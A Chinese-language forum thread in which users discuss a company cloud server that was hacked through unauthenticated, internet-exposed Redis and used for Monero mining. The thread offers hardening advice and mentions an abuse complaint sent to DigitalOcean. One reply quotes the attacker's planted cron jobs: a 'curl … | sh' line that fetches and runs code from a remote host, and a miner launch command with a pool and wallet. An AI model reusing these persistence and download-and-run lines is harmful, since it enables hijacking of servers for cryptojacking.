今天发现公司的阿里云服务被黑了,被安装了 yam 来挖矿

脚本写的不错! 发来看看 怎么写的

@stanjia 直接访问那个地址啊

@wraith4 哈哈哈哈哈

502 Bad Gateway

所以说你们公司的 redis 可以公网访问？

这个服务器是不是跑 jboss 的……笑……

所以脚本是怎么写的。。

redis 一般是放在内网的

放出来参考下吧

shell

redis 未授权访问的漏洞都这么长时间了还不修复。。。活该被黑啊

没勒索数据的就是良心黑客了, 赶紧偷笑去吧.

我只是想偷偷挖个矿。。。

@hard2reg 还被发现了…

没有觉得写的多好啊、、、

公司内网的测试机也这样被爆过，重要文件被打包加密然后删除了目录。
要勒索 N 个比特币，我 TM 有这么多比特币还在这陪你玩？最后重装服务器搞定 。

1, 到手注入公钥后立马关掉密码登录
2, 除了 http 外的所有服务都不要开公网访问
能做到着两点的话, 基本安全无虞

2 天前中招, r.chanstring.com 解析在 DO 的 IP
在 digitalocean 投诉过 说处理 都 2 天了 这机器竟然还他妈在线
https://i.niupic.com/images/2016/06/20/OBjiiQ.jpg

会加 2 条定时任务

*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh
*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]-pool.fr:6666/xmr &


官方回
Hey there,

Thank you for your response.

Thank you for submitting your abuse complaint. One of our support engineers has picked it up and assigned it to the customer in question and it will be resolved as soon as possible.

Looking forward to hearing from you if you have any other questions or require any further assistance.

Thank you!
Jeff Elliott
Trust & Safety Specialist
DigitalOcean Support

然后就没下文了

这个国人干的事
登录 IP 是阿里云的

redis 居然可以公网访问....

开源软件默认不加口令害死人啊
即便开放在内网也不安全的

这是公司的外网测试环境，小公司，没有专业运维人员。

唉我前段时间被搞的那只 Server 给人装了 BOINC,这是不是业界良心啊。

redis 漏洞本身不致命，用 root 账户登录服务器并启动程序才是致命的。

几层楼以上的,怎么还怪起开源软件的默认配置了,实际上都应该自己好好配置下的,只是大部分人都忽略了.

竟然用 root 账户启动 redis

總之是自己作死，不怪人家 Redis

插播广告：专业接安全运维的活儿，有兴趣的私聊哈！